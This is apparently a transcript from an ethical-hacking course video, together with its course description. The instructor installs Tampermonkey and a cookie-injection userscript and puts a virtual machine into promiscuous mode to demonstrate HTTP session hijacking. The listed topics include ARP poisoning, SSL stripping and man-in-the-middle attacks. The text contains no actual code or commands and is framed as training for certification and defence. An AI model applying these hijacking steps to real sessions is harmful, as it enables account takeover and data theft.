Install Tampermonkey, and show how interception of a cookie from network traffic allows an HTTP session to be hijacked.
- [Instructor] In order to demonstrate how a session…can be hijacked using cookies, I first have to install…an extension called Tampermonkey into my Chrome browser,…and install a cookie injection script.…I'm at the Tampermonkey site,…and I'll select the Stable version.…Chrome will ask if I want to add the extension.…I do.…It downloads and automatically installs.…Now I've got Tampermonkey installed.…I need to install an injection script.…
The userscripts site holds a number of scripts…and the Original Cookie Injector script,…which is shown here, will do us just fine.…I'll select and copy it with Control + C.…I'll open the Tampermonkey icon on the top right,…and select Add a new script.…I'll paste the script onto the script page.…There's a few missing semicolons.…I'll just add them and clean up the syntax errors.…
Okay, I'll now save the script,…and we can see the Cookie injection script is active.…Note that before I start the hijack, I need to set…the virtual machine to allow promiscuous mode…so that I can collect network traffic.…
This course teaches you what session hijacking is, and how black-hat hackers use it to attack an organization. Learn how TCP, web, and wireless protocols work and how hackers exploit them. Find out how to use built-in Windows and Linux tools, as well as specialized third-party solutions such as Zed Attack Proxy (ZAP) and Cain, to detect and shore up vulnerabilities. Author and cybersecurity expert Malcolm Shore also discusses remote hijacking, which allows hackers to take control of drones or even vehicles.
Note: This course maps to the Session Hijacking domain of the Certified Ethical Hacking exam. Review the exam objectives at the EC-Council's website.
- Hijacking a network session, such as a Telnet session
- Understand web sessions
- Intercepting sessions via man-in-the-middle or man-in-the-browser attacks
- Downgrading a session by stripping SSL
- Using ARP poisoning through Subterfuge
- Hijacking an HTTP session through cookies
- Using hijacking defense tools: Zed Attack Proxy and Cain
- Service hijacking (DNS and SSH)
- Hijacking in the physical world: cars and drones